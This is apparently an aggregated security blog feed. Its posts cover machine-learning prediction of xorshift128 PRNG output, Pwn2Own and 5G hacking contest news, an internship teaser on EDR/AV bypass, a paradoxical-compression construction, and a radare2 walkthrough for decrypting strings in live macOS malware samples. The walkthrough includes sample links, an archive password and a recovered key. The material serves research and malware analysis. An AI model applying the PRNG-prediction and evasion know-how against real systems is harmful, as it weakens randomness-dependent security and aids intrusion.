As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation of xorshift128 PRNG only uses the first and last numbers of the four, called w and x, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs (the last four generated numbers merged) from the input layer to the 1024 nodes of the hidden layer in our trained model, to see how strongly they are connected, and hence verify which bits are used to generate the outputs. The following figure shows the value of the weights (on the y-axis) connecting each input (on the x-axis) to the 1024 hidden nodes in the hidden layer. In other words, each dot on the graph represents the weight from one of the hidden nodes to one input:

As we can see, very few of the hidden nodes are connected to any given input: those where the weight is greater than ~2.5 or less than ~-2.5. The rest of the nodes, with low weights between -2 and 2, can be considered unconnected. We can also notice that inputs between bits 32 and 95 are not connected to any hidden node. This is because, as we stated earlier, the implementation of the xorshift128 PRNG uses only x (bits 0 to 31) and w (bits 96 to 127) from the inputs; the other two inputs, y and z (bits 32 to 95), are not used to generate the output, and that is exactly what the model has learned. This implies that the model has accurately learned this pattern from the data given in the training phase.
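A plot like the one described can be reproduced in a few lines once the model is trained (an illustrative sketch; Keras stores the first Dense layer’s kernel as a 128×1024 array):

import matplotlib.pyplot as plt

W, b = model.layers[0].get_weights()    # W.shape == (128, 1024)
for i in range(W.shape[0]):
    plt.scatter([i] * W.shape[1], W[i], s=1)   # one column of dots per input bit
plt.xlabel("input bit index")
plt.ylabel("weight to each hidden node")
plt.show()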

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output, in x-axes, to the 1024 hidden nodes in the hidden layer:

Like our previous observation, each output bit is connected to only a very few nodes from the hidden layer, except perhaps bit 11, which is less decisive and may need more training to become less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but the rest can be done the same way. If we focus only on bit 0 in the figure, we can see that it is connected to only five nodes from the hidden layer, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes, which we circled in the figure. They are bits 0, 8, 96, and 115; if we take them modulo 32, we get bits 0 and 8 from the first number, x, and bits 0 and 19 from the fourth number, w. This matches the xorshift128 output function we derived in section 2: the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8. We expect the five hidden nodes together with the one output node to resemble the functionality of an XOR of these four input bits. Hence, the ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.
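This kind of tracing can also be scripted rather than read off the plots. A hedged sketch (using the ~2.5 magnitude threshold from above; layer indices assume our two-Dense-layer model):

import numpy as np

W1, _ = model.layers[0].get_weights()   # (128, 1024): inputs -> hidden
W2, _ = model.layers[1].get_weights()   # (1024, 32): hidden -> outputs

hidden = np.where(np.abs(W2[:, 0]) > 2.5)[0]             # nodes driving output bit 0
inputs = np.unique(np.where(np.abs(W1[:, hidden]) > 2.5)[0])
print(hidden)                # e.g. the five nodes 120, 344, 395, 553, 788
print(inputs, inputs % 32)   # e.g. bits 0, 8, 96, 115 -> 0, 8 (x) and 0, 19 (w)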

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only the w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 19 bits to the right, which can be binary encoded as 100110, where the least significant bit, 0, represents the right direction. The variable x is shifted 11 bits to the left, which can be binary encoded as 010111, where the least significant bit, 1, represents the left direction. This representation takes 4 bits + 4×6 bits = 28 bits. Of course, we need to make sure that the 4 bits that select the variables do not take the values 0000, 0001, 0010, 0100, or 1000, as they would select one variable or none to XOR.
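A sketch of this encoding (our illustration of the scheme just described; the exact bit layout is an assumption) could look like:

def encode_config(var_mask, shifts):
    # var_mask: 4 bits selecting which of x, y, z, w feed the output.
    # shifts: four (amount, direction) pairs; direction 0 = right, 1 = left.
    cfg = var_mask
    for amount, left in shifts:
        cfg = (cfg << 6) | (amount << 1) | left   # 5 bits amount + 1 bit direction
    return cfg

# w and x selected (1001), w >> 19 (100110), x << 11 (010111):
print(bin(encode_config(0b1001, [(19, 0), (11, 1), (0, 0), (0, 0)])))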

This simple update adds little complexity to the PRNG implementation, yet it means that an ML model would learn only one of about 16M different sequences that the same algorithm can generate with different seeds; it is as if the ML model had learned the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks; the other properties of the resulting PRNG, such as its periodicity, are yet to be studied.

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consequent numbers generated from this PRNG, it can generate the exact sequence without getting access to the seed. We also studied how we can design an NN model that would represent this PRNG the best. Here are some of the lessons learned from this article:

  1. Although xorshift128’s output may appear to humans to follow no pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2. Applying deep learning to predict PRNG output requires understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models attain higher accuracy than simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The Python code for training and testing the model outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code is built on top of an old version of the code shared in the post in [1], with the changes explained in this post. This was done intentionally to keep the data and other parameters unchanged for a fair comparison.

Acknowledgment

I would like to thank my colleagues at NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The repo for code implementation  for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/

Talos Takes Ep. #73 (NCSAM edition): Fight the phish from land, sea and air

15 October 2021 at 15:07
By Jon Munshaw. The latest episode of Talos Takes is available now. Download this episode and subscribe to Talos Takes using the buttons below, or visit the Talos Takes page. Most people may think of spam as being the classic email promising that you've won the lottery or some great prize,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Adding a Beta NAS Device to Pwn2Own Austin

14 October 2021 at 20:26

Today, we are announcing the inclusion of the beta version of the Western Digital 3TB My Cloud Home Personal Cloud in our upcoming Pwn2Own Austin competition. Normally, devices under test are updated to the most recent publicly available patch level. This is still the case. However, our partners over at Western Digital wanted to include their upcoming beta software release in this year’s event. Consequently, we are adding the beta version as an available target in addition to the existing current version of the NAS device.

If a contestant can get code execution on the beta release of the Western Digital 3TB My Cloud Home Personal Cloud, they will earn $45,000 (USD) and 5 Master of Pwn points. There are some significant differences between the released software version and the beta version, so we suggest contestants upgrade their systems to test their exploits prior to the contest. To get the beta version installed on your NAS, you will need to enter your email address and the MAC address of your device in this form. Within a few hours, an automated process to update the NAS will begin. The updates will take you from 7.15.1-101 (current) to 7.16.0-216 and then the beta 8.0.0-301. Please note that not all features and applications included in the current version of the software release are available in the beta version.

Again, registration for the contest closes at 5:00 p.m. Eastern Daylight Time on October 29, 2021. A full copy of the rules – including this new change – is available here. They may be changed at any time without notice. We highly encourage potential entrants to read the rules thoroughly and completely should they choose to participate. If you have any questions, please forward them to [email protected].

We believe exploiting the beta version of this software will not be trivial, but we certainly hope someone tries. We look forward to seeing all the attempts and to learning about the latest exploits and attack techniques on these devices.

Good luck, and we’ll see you in Austin.


Threat Source newsletter (Oct. 14, 2021)

14 October 2021 at 18:00
Newsletter compiled by Jon Munshaw.Good afternoon, Talos readers.   It's still Cybersecurity Awareness Month, and what better way to celebrate by patching and then patching some more?  This week was Microsoft Patch Tuesday, which only included two critical vulnerabilities, but still...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Vulnerability Spotlight: Code execution vulnerabilities in Nitro Pro PDF

14 October 2021 at 17:17
A Cisco Talos team member discovered these vulnerabilities. Blog by Jon Munshaw.  Cisco Talos recently discovered multiple vulnerabilities in the Nitro Pro PDF reader that could allow an attacker to execute code in the context of the application.  Nitro Pro PDF is part of Nitro Software’s...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

NCC Group placed first in global 5G Cyber Security Hack competition

14 October 2021 at 09:00

In June of this year, Traficom – the Finnish transport and communications agency – along with Aalto University, Cisco, Ericsson, Nokia, and PwC, organized the 5G Cyber Security Hack competition. This hackathon-style event was a follow-up to their successful 2019 event, held in Oulu, Finland. Due to Covid restrictions, this year’s event was fully remote, which made it easier for a larger pool of security experts to take part. As in 2019, there were four interesting hacking challenges relating to 5G technology and its use cases. The NCC Group team participated in the 2019 event and finished second in the Ericsson challenge, so we were eager to take on this year’s challenge. Around 130 security experts from around the world took part this year; teams are invited to participate by application only.

This year, NCC Group consultants, Ross Bradley, Eva Esteban Molina, Phil Marsden and Mark Tedman took part in the Ericsson “Hack the Crown Jewels” challenge, for which they won first prize.

5G networks offer greater connectivity and faster wireless broadband and are now being rolled out across a large proportion of the world, with 250+ million subscribers worldwide. With that comes an exponential increase in 5G speed and capacity, and there has been a decisive shift in technology development, pushing new capability from home networks to critical national infrastructure, all using 5G equipment. The security of 5G networks is now high on the agenda of many operators, vendors, and governments, and excellent events like the 5G Cyber Security Hack highlight the continuing work to help secure these networks.

This Hack challenge offered hackers four real-life use cases for 5G to work on – a Cisco CTF challenge on a staged 5G network, a 5G Ericsson Packet Core Gateway, Nokia’s edge data center system and PwC/Aalto University’s 5G testbed.

The Hack is admittedly fun, but it isn’t just for fun – these kinds of activities play a crucial part in the iterative design and engineering process for network equipment manufacturers, ensuring the security and safety of users. Each company putting forward a use case also offered bug bounty prize money, shared among the best hackers/teams, as one mechanism for helping vendors find and remediate security risks in their systems before threat actors can exploit them.

The 5G Packet Core Gateway challenge

The details of the overall event, including the findings of individual challenges, are subject to non-disclosure agreements, but the exercise itself was a great demonstration of our Telecommunications Practice’s capability. The 5G Ericsson Packet Core Gateway is a key part of the mobile 5G core infrastructure, and it is essential that all vendors understand how vulnerabilities and security risks within it could be exploited by an attacker. We dedicated our time to the Ericsson challenge, which focused on finding security weaknesses in the backbone of the mobile 5G core infrastructure – the Packet Core Gateway.

The hackathon started with an introduction on Friday evening, with challenges opening to competitors at 8pm. Hacking continued all weekend until 11am on Sunday morning. Our findings were shared with the Ericsson team throughout the competition, with final findings submitted before the 11am Sunday deadline. Prizes were awarded on Sunday afternoon, at which time it was revealed that we had won the Ericsson challenge (and come second in the team photo)! The event was well run by the Ericsson team and the event organisers, and we look forward to participating in future events.

About NCC Group’s Telecommunications Practice

This competition is just one of the many ways that NCC Group is actively improving the security of 5G infrastructure. In addition to our 5G security research (some of which is published on this blog), we regularly work closely with network equipment manufacturers and operators alike, including through paid consulting engagements. We conduct regular security reviews of 5G core and RAN equipment, with specialist researchers and consultants skilled in everything from reverse engineering and hardware reviews to detailed high level threat assessments.

All aboard the internship – whispering past defenses and sailing into kernel space

13 October 2021 at 12:25

Previously, we published Sander’s (@cerbersec) internship testimony. Since that post does not contain any juicy technical details, and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey, quite the contrary. In Part 2, Sander extended our BOF arsenal with additional process injection techniques and persistence. With all this functionality bundled in an Aggressor Script, CobaltWispers was born.

We are considering open-sourcing this little framework, but some final tweaks are required first, as explained in the Part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!


KdPrint(“Hello, world!\n”);

When I finished my previous internship, which focused on bypassing Endpoint Detection and Response (EDR) and Anti-Virus (AV) software from a user-land point of view, we joked around with the idea that the next topic would be defeating the same problem, but from kernel land. At that point in time I had no experience at all with the Windows kernel, and it all seemed very advanced and above my level of technical ability. As I write this blog post, I have to admit it wasn’t as scary or difficult as I thought it would be. C/C++ is still C/C++, and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.


About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Paradoxical Compression with Verifiable Delay Functions

13 October 2021 at 10:00

We present here a new construction which has no real immediate usefulness, but is a good illustration of a fundamental concept of cryptography, namely that there is a great difference between knowing that some mathematical object exists, and being able to build it in practice. Thus, this construction can be thought of as having some educational virtue, in the spirit of the mathematical recreations that have been a favourite pastime of mathematicians since at least the early 17th century.

We call paradoxical compression a lossless compression algorithm such that:

  • On any input x (a sequence of bits), it produces an output C(x) (another sequence of bits) such that the original x can be rebuilt from C(x) (the compression is lossless).
  • There is at least one input x0 such that C(x0) is strictly shorter than x0 (the algorithm really deserves to be called a compression algorithm).
  • The input size is never increased: for all x, C(x) is never strictly longer than x.

This is mathematically impossible. There is no compression algorithm that can achieve these three properties simultaneously. Despite this impossibility, we can achieve it in practice. A paper describing the algorithm, and a demo implementation, are available at:
https://github.com/pornin/paradox-compress

The paper is also available on eprint.

A Few Important Warnings

  • This is not “infinite compression”. We are not talking about a compression algorithm that could reduce the size of every possible input. That would be very useful indeed, but it is impossible, and, so to speak, a lot more impossible than paradoxical compression. We merely claim that the output is not larger than the input, not that it is always shorter.
  • Both paradoxical and infinite compression have been “achieved” by various people when working on files by moving some information into the file metadata (file name, date of creation or last modification…). We are not dealing here with such tricks; our inputs and outputs are generic sequences of bits, that do not have any metadata.

On the Impossibility of Paradoxical Compression

Let x0 be an input which is reduced by the compression algorithm. For instance, suppose that x0 has length 1000 bits, but C(x0) has length 900 bits. For the compression algorithm to deserve that name, such an input must exist.

There are exactly 2^901 − 1 possible bit sequences of up to 900 bits. Every one of them should be compressible into another bit sequence of up to 900 bits. Thus, all 2^901 − 1 bit sequences are mapped to bit sequences in the same set. But the mapping must be injective: if two bit sequences are mapped to the same output, then that output cannot be reliably decompressed, since there would be two corresponding inputs. The hypothesis of losslessness forbids that situation. Therefore, all 2^901 − 1 bit sequences of length up to 900 bits are mapped by the compression algorithm to 2^901 − 1 distinct bit sequences of length up to 900 bits. This necessarily exhausts all of them, in particular C(x0). This implies that the compression of x0 produces an output which is also the result of compressing another input x1 distinct from x0 (since x1 has length at most 900 bits, while x0 has length 1000 bits). This is a contradiction: the compression algorithm cannot be lossless.

This simple demonstration is an application of what is now known as the pigeonhole principle, a well-known remark that can be expressed in set theory as follows: there cannot be an injective mapping from a finite set S1 to a finite set S2 if the cardinality of S2 is strictly lower than the cardinality of S1. In the early 17th century, the French Jesuit Jean Leurechon used it to explain that there necessarily are at least two men in the world with the same number of hairs, since there are more men in the world than hairs on the head of any single man. The principle was restated several times along the centuries, with various metaphors, one of the most recent ones involving pigeons in a dovecote.

In the context of paradoxical compression, the pigeonhole principle basically means that there must exist a “problematic input” x that breaks one of the alleged properties: either C(x) is larger than x, or decompression of C(x) does not yield x back, or the compression or decompression algorithm fails to terminate.

Achieving Paradoxical Compression

Since we know that paradoxical compression is impossible, achieving it nonetheless is going to require some creativity. In other words, we will “cheat”. The conceptual trick here is the following: there exist some “problematic inputs”, but there are not necessarily many of them. Maybe we can arrange for them to be hard to find? In essence, we are moving the target: we won’t make an algorithm that can be proven to always work, but we might make one such that nobody can find a problematic input (even though everybody knows that these problematic inputs necessarily exist).

This is where the gist of the trick lies: there is an existence proof for problematic inputs, but this is not a constructive proof, since it only demonstrates that such inputs must exist; it does not reveal them. In the world of mathematics, existence proofs are enough to conclude; but in the world of computers, which operate under finite resources, constructive proofs do not automatically follow. Most of cryptography thrives in the gap between existence and constructive proofs. For instance, given a strong, cryptographically secure hash function such as SHA-256, we perfectly know that collisions must exist (the SHA-256 input space is vastly larger than the SHA-256 output space, so the SHA-256 function cannot be injective), but nobody ever managed to find one. We can even describe algorithms that will produce collisions if executed, but at a computational cost that far exceeds our available resources, so we cannot do that in practice.

In the case of paradoxical compression, the construction can be described as successive improvements. Let’s start with a “normal” compression algorithm such as DEFLATE (the core algorithm in the GZip and Zlib formats, also used in traditional Zip archives). This algorithm can reduce the size of some sequences of bits, in particular structured data commonly encountered in practical applications. However, for most possible inputs (e.g. output of a random generator), it will slightly increase the size. We want to fix that. A simple method is the following:

  • Compression: if DEFLATE(x) is shorter than x, then return DEFLATE(x). Otherwise, return x.
  • Decompression: if y can be inflated into x, then return x. Otherwise, return y.

This method assumes that a “compressed output” can be unambiguously distinguished from any other sequence of bits. This is, of course, not true, and it is easy to make this algorithm fail by applying the compressor on its own output: for a given x, C(x) is usually not itself compressible (after all, DEFLATE does a good job at removing the redundancies that DEFLATE itself leverages), so that C(C(x)) will return C(x) itself. Then, decompression of C(C(x)) will return x instead of C(x). C(x) is then a “problematic input” since it does not survive a compression-decompression cycle.

Now, we can handle that case by adjoining a counter in some sort of header. Compressed outputs will start with a counter of 0. If the input to the compression algorithm is already a compressed output, we’ll just increase the counter; the counter is really the number of nested invocations of the compression algorithm. This leads to the following:

  • Compression of x:
    • If DEFLATE(x) is shorter than x with some extra room for our counter (say, a 32-bit counter), then return DEFLATE(x) || 0.
    • Otherwise, if the input is itself x = DEFLATE(x’) || c for some input x’ and counter c, then return DEFLATE(x’) || c+1.
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 for some x, then return x.
    • Otherwise, if y = DEFLATE(x) || c from some input x and counter c > 0, then return DEFLATE(x) || c-1.
    • Otherwise, return y.
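As a toy illustration of this counter scheme (ours, not the paper’s code; we use zlib’s DEFLATE and an explicit magic tag to mark our own outputs, whereas the scheme above detects them by attempting inflation):

import zlib

MAGIC = b"PC"   # hypothetical tag marking our own outputs

def compress(x: bytes) -> bytes:
    d = zlib.compress(x)
    if len(d) + 6 < len(x):                  # worth it: tag + 32-bit counter fit
        return MAGIC + (0).to_bytes(4, "big") + d
    if x.startswith(MAGIC) and len(x) >= 6:  # already one of our outputs
        c = int.from_bytes(x[2:6], "big")
        return MAGIC + (c + 1).to_bytes(4, "big") + x[6:]  # overflows at 2^32 - 1!
    return x

def decompress(y: bytes) -> bytes:
    if y.startswith(MAGIC) and len(y) >= 6:
        c = int.from_bytes(y[2:6], "big")
        if c == 0:
            return zlib.decompress(y[6:])
        return MAGIC + (c - 1).to_bytes(4, "big") + y[6:]
    return y

assert decompress(compress(b"hello " * 100)) == b"hello " * 100

Crafted inputs carrying our tag (e.g., with a counter of all ones) can still break this toy, which is exactly the hole the keyed construction below closes.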

Does this work? Mostly. If you implement it and try it on some examples, including by trying to compress a compression output, then this seems to work. However, the problematic inputs are not unreachable. It can be shown that the above necessarily works except in a single place, which is the computation of c+1 in the second compression case: since the counter slot has a given fixed length, it may overflow. For instance, if the counter is a 32-bit integer, and c happens to be equal to 2^32 − 1, then c+1 does not fit. The compression algorithm would typically truncate the value to its low 32 bits, yielding 0, and decompression would not return the proper bit sequence. In other words, the “problematic inputs” are exactly the values DEFLATE(x) || 0xFFFFFFFF. You might take solace in the idea that it is unlikely that such an input occurs in practical, non-adversarial situations, but they are still easy enough to build. Thus, this is not good enough for us. We want a construction that cannot be broken even when actively trying to find a problematic input.

Note, though, that building a problematic input by compressing the output repeatedly is very inefficient; with a 32-bit counter, it takes more than 4 billion recursive calls. Of course, if you want to make a problematic input on purpose, you don’t do that; you directly set the counter to the all-ones value. But what if you can’t?

Let’s now suppose that the compression and decompression algorithms are really compression and decompression systems that can be invoked, but which are opaque to attackers (this is called the “blackbox model”). In that case, we may imagine that the compressor somehow signs its outputs, so that attackers who want to make a problematic input cannot directly set the counter to the all-ones value; if the attacker must use the compression system to increase the counter, then reaching a counter overflow would require an inordinately large number of invocations. If the counter is large enough (e.g. 64 bits or more), then the compression system cannot do that in any practical time. This leads us to the following construction:

  • The compression and decompression system are assumed to share a secret key K. That key is used in a message authentication code (MAC). The MAC is supposed to be stateless, deterministic and unforgeable; in practice, consider it to be HMAC/SHA-256, possibly with an output truncated to 128 bits.
  • Compression of x:
    • If DEFLATE(x) is shorter than x by at least 64+128 = 192 bits, then return DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) (i.e. the concatenation of DEFLATE(x), the counter value 0 over 64 bits, and a 128-bit MAC computed over these two elements).
    • Otherwise, if the input is x = DEFLATE(x’) || c || MAC(DEFLATE(x’) || c) for some input x’ and counter c, then return DEFLATE(x’) || c+1 || MAC(DEFLATE(x’) || c+1).
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) for some input x, then return x.
    • Otherwise, if y = DEFLATE(x) || c || MAC(DEFLATE(x) || c) for some input x and counter c > 0, then return DEFLATE(x) || c-1 || MAC(DEFLATE(x) || c-1).
    • Otherwise, return y.

This construction achieves paradoxical compression because the problematic inputs (with counter c close to overflow) can be obtained only from the compression system itself (since we assume the MAC to be unforgeable), and the compression system increments counter values only one at a time; getting a problematic input would then require far too many (2^64 in this example) invocations of the compression system to be feasible in practice. If problematic inputs cannot be built, we win: nobody can make our compression/decompression system fail.

Removing the Shared Key Requirement

The construction above uses a MAC that relies on a shared secret value (the MAC key) between the compression and decompression systems. This is a restrictive model and we would like to remove this requirement. Can we build the same system, but in a keyless fashion?

We can, with a verifiable delay function (VDF). Such functions have been recently defined. In a nutshell, a VDF is a sort of hash function that takes a configurable time to compute (with no known shortcut) but also comes with a proof of correct computation, and the proof can be verified at a low computational cost. This is an extension of earlier time-lock puzzles. One can think of a VDF as a time-lock puzzle that can be verified to have been properly set.

In our paradoxical compression system described above, we used a MAC with a secret key in order to prevent outsiders from building problematic inputs. We can replace the MAC with a VDF, using the counter itself as the work factor: an input with a very high counter value cannot be built in practice because that would mean a very high work factor. The secrecy of the key is replaced with a “computational wall”: the VDF becomes too expensive to compute for high counter values.

I implemented this method using a VDF designed by Wesolowski. It is based on computing squarings modulo a big composite integer (i.e. an RSA modulus): raising an input x to the power 2^c modulo n is postulated to require c successive squarings modulo n, with no known “shortcut” if the factorization of n is not known. Wesolowski’s VDF comes with a compact proof of correct computation that can be efficiently verified. The implementation is in C# (mostly because C# has a DEFLATE implementation in its standard library, and I already had C# implementations of the SHA3/SHAKE hash functions and of big integers with primality tests). The 2048-bit modulus was generated as a random RSA key (I discarded the prime factors; now nobody knows them). The code can be obtained on GitHub.
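The core sequential-squaring evaluation is easy to sketch in a few lines of Python (illustrative only; the actual implementation is the C# code linked above, and the Wesolowski proof generation/verification is omitted):

def vdf_eval(x, c, n):
    # Compute x^(2^c) mod n by c sequential squarings; with the
    # factorization of n unknown, no shortcut is known, so the
    # work grows linearly with the counter c.
    for _ in range(c):
        x = (x * x) % n
    return x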

The code is open-source and you may reuse it as you will (under the MIT license), but of course achieving paradoxical compression is not, in fact, a very useful property: it does not solve any real, practical problem. However, it is an enjoyable party trick.

Vulnerability Spotlight: Use-after-free vulnerability in Microsoft Excel could lead to code execution

12 October 2021 at 19:48
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.  Cisco Talos recently discovered a use-after-free vulnerability in the ConditionalFormatting functionality of Microsoft Office Excel 2019 that could allow an attacker to execute arbitrary code on the...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Techniques for String Decryption in macOS Malware with Radare2

12 October 2021 at 17:52

If you’ve been following this series so far, you’ll have a good idea how to use radare2 to quickly triage a Mach-O binary statically and how to move through it dynamically to beat anti-analysis attempts. But sometimes, no matter how much time you spend looking at disassembly or debugging, you’ll hit a roadblock trying to figure out your macOS malware sample’s most interesting behavior because much of the human-readable ‘strings’ have been rendered unintelligible by encryption and/or obfuscation.

That’s the bad news; the good news is that while encryption is most definitely hard, decryption is, at least in principle, somewhat easier. Whatever methods are used, at some point during execution the malware itself has to decrypt its code. This means that, although there are many different methods of encryption, most practical implementations are amenable to reverse engineering given the right conditions.

Sometimes, we can do our decryption statically, perhaps emulating the malware’s decryption method(s) by writing our own decryption logic(s). Other times, we may have to run the malware and extract the strings as they are decrypted in memory. We’ll take a practical look at using both of these techniques in today’s post through a series of short case studies of real macOS malware.

First, we’ll look at an example of AES 128 symmetric encryption used in the recent macOS.ZuRu malware and show you how to quickly decode it; then we’ll decrypt a Vigenère cipher used in the WizardUpdate/Silver Toucan malware; finally, we’ll see how to decode strings dynamically, in-memory while executing a sample of a notorious adware installer.

Although we cannot cover all the myriad possible encryption schemes or methods you might encounter in the wild, these case studies should give you a solid basis from which to tackle other encryption challenges. We’ll also point you to some further resources showcasing other macOS malware decryption strategies to help you expand your knowledge.

For our case studies, you can grab a copy of the malware samples we’ll be using from the following links:

  1. macOS.ZuRu pwd:infect3d
  2. WizardUpdate
  3. Adware Installer

Don’t forget to use an isolated VM for all this work: these are live malware samples and you do not want to infect your personal or work device!

Breaking AES Encryption in macOS.ZuRu

Let’s begin with a recent strain of new macOS malware dubbed ‘macOS.ZuRu’. This malware was distributed inside trojanized applications such as iTerm, MS Remote Desktop and others in September 2021. Inside the malware’s application bundle is a Frameworks folder containing the malicious libcrypto.2.dylib. The sample we’re going to look at has the following hash signatures:

md5 b5caf2728618441906a187fc6e90d6d5
sha1 9873cc929033a3f9a463bcbca3b65c3b031b3352
sha256 8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b

Let’s load it into r2 in the usual way (if you haven’t read the earlier posts in this series, catch up here and here), and consider the simple sequence of reversing steps illustrated in the following images.

Getting started with our macOS.ZuRu sample

As shown in the image above, after loading the binary, we use ii to look at the imports, and see among them CCCrypt (note that I piped this to head for display purposes). We then do a case insensitive search on ‘crypt’ in the functions list with afll~+crypt.

If we add [0] to the end of that, it gives us just the first column of addresses. We can then do a for-each over those using backticks to pipe them into axt to grab the XREFS. The entire command is:

> axt @@=`afll~crypt[0]`

The result, as you can see in the lower section of the image above, shows us that the malware uses CCCrypt to call the AESDecrypt128 block cipher algorithm.

AES128 requires a 128-bit key, which is the equivalent of 16 bytes. Though there’s a number of ways that such a key could be encoded in malware, the first thing we should do is a simple check for any 16 byte strings in the binary.

To do that quickly, let’s pipe the binary’s strings through awk and filter on the length column for ‘16’: that’s the fourth column in r2’s iz output. We’ll also narrow the output down to just cstrings by grepping on ‘string’, so our command is:

> iz | awk '$4==16' | grep string

We can see the output in the middle section of the following image.

Filtering the malware’s strings for possible AES 128 keys

We got lucky! There are two occurrences of what is obviously not a plain text string. Of course, it could be anything, but if we check out the XREFS, we can see that this string is provided as an argument to the AESDecrypt method, as illustrated in the lower section of the above image.

All that remains now is to find the strings that are being deciphered. If we get the function summary of AESDecrypt from the address shown in our last command, 0x348b, it reveals that the function is using base64 encoded strings.

> pds @ 0x348b
Grabbing a function summary in r2 with the pds command

A quick and dirty way to look for base64 encoded strings is to grep on the “=” sign. We’ll use r2’s own grep function, ~ and pipe the result of that through another filter for “str” to further refine the output.

> iz~=~str
A quick-and-dirty grep for possible base64 cipher strings

Our search returns three hits that look like good candidates, but the proof is in the pudding! What we have at this point is candidates for:

  1. the encryption algorithm – AES128
  2. the key – “quwi38ie87duy78u”
  3. three ciphers – “oPp2nG8br7oIB+5wLoA6Bg==, …”

All we need to do now is to run our suspects through the appropriate decryption routine for that algorithm. There are online tools such as Cyber Chef that can do that for you, or you can find code for most popular algorithms for your favorite language from an online search. Here, we implemented our own rough-and-ready AES128 decryption algorithm in Go to test out our candidates:

A simple AES128 ECB decryption algorithm implemented in Go
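If Go isn’t your thing, the same check is a few lines of Python with pycryptodome (a sketch based on the candidates above; ECB mode per the function we found, with any trailing padding left for manual inspection):

from base64 import b64decode
from Crypto.Cipher import AES   # pip install pycryptodome

key = b"quwi38ie87duy78u"                  # candidate key from the strings
aes = AES.new(key, AES.MODE_ECB)
for c in ["oPp2nG8br7oIB+5wLoA6Bg=="]:     # candidate ciphers go here
    print(aes.decrypt(b64decode(c)))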

We can pipe all the candidate ciphers to file from within r2 and then use a shell one-liner in a separate Terminal window to run each line through our Go decryption script with the candidate key.

Revealing the strings in clear text with our Go decrypter

And voila! With a few short commands in r2 and a bash one-liner, we’ve decrypted the strings in macOS.ZuRu and found a valuable IoC for detection and further investigation.

Decoding a Vigenère Cipher in WizardUpdate Malware

In our second case study, we’re going to take a look at the string encryption used in a recent sample of WizardUpdate malware. The sample we’ll look at has the following hash signatures:

md5 0c91ddaf8173a4ddfabbd86f4e782baa
sha1 3c224d8ad6b977a1899bd3d19d034418d490f19f
sha256 73a465170feed88048dbc0519fbd880aca6809659e011a5a171afd31fa05dc0b

We’ll follow the same procedure as last time, beginning with a case insensitive search of functions with “crypt” in the name, filtering the results of that down to addresses, and getting the XREFS for each of the addresses. This is what it looks like on our new sample:

Finding our way to the string encryption code from the function analysis

We can see that there are several calls from main to a decrypt function, and that function itself calls sym.decrypt_vigenere.

Vigenère is a well-known cipher algorithm which we will say a bit more about shortly, but for now, let’s see if we can find any strings that might be either keys or ciphers.

Since a lot of the action is happening in main, let’s do a quick pds summary on the main function.

Using pds to get a quick summary of a function

There are at least two strings of interest. Let’s take a better look by leveraging r2’s afns command, which lists all strings associated with the current function.

r2’s afns can help you isolate strings in a function

That gives us a few more interesting looking candidates. Given its length and form, my suspicion at this point is that the “LBZEWWERBC” string is likely the key.

We can isolate just the strings we want by successive filtering. First, we get just the rows we want:

> afns~:1..5

And then grab just the last column (ignoring the addresses):

> afns~:1..5[2]

